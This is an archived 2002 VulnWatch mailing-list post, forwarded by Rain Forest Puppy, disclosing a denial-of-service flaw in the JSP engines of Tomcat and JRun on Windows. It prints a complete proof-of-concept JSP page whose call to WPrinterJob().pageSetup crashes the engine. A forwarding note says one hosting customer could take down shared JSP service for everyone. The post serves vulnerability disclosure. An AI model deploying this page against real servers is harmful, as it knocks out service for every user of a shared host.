OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Rain Forest Puppy (rfpvulnwatch.org)
Date: Tue Jun 11 2002 - 19:07:55 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    [ RFP's note: ISP/hosting providers with JSP support may be vulnerable to
    one malicious customer taking down the JSP engine for everyone. ]

    Date: Wed, 12 Jun 2002 00:50:05 +0200 (MES)
    From: Marc Schoenefeld <marc.schoenefelduni-muenster.de>
    To: vulnwatchvulnwatch.org
    Subject: Generic Crash-JSP

    Hi,

    The following JSP kills the JSP-Engines of
    TOMCAT and JRUN on windos machines,resulting
    in a DoS.

    Yours sincerely
    Marc Schnefeld

    ===================begin=============================
    <% page contentType="text/html;charset=UTF-8" pageEncoding="iso-8859-1"
    %>
    <% page import="sun.awt.windows.*" %>
    <%! %>
    <%
    //
    %>
    <html>
    <head>
    <title>aa</title>
    </head>
    <body>

    <p>
    <FONT SIZE="+2">dON/T TR1 thiz home</font>
    </p>
    <%
             new WPrinterJob().pageSetup(null,null);
    %>

    </body>
    </html>
    ====================end==============================

    --
    -- Mahatma Gandhi--
    First they ignore you
    Then they laugh at you
    Then they fight you
    Then you win
    -- Mahatma Gandhi--
    

    Marc Schnefeld Dipl. Wirtsch.-Inf. / Software Developer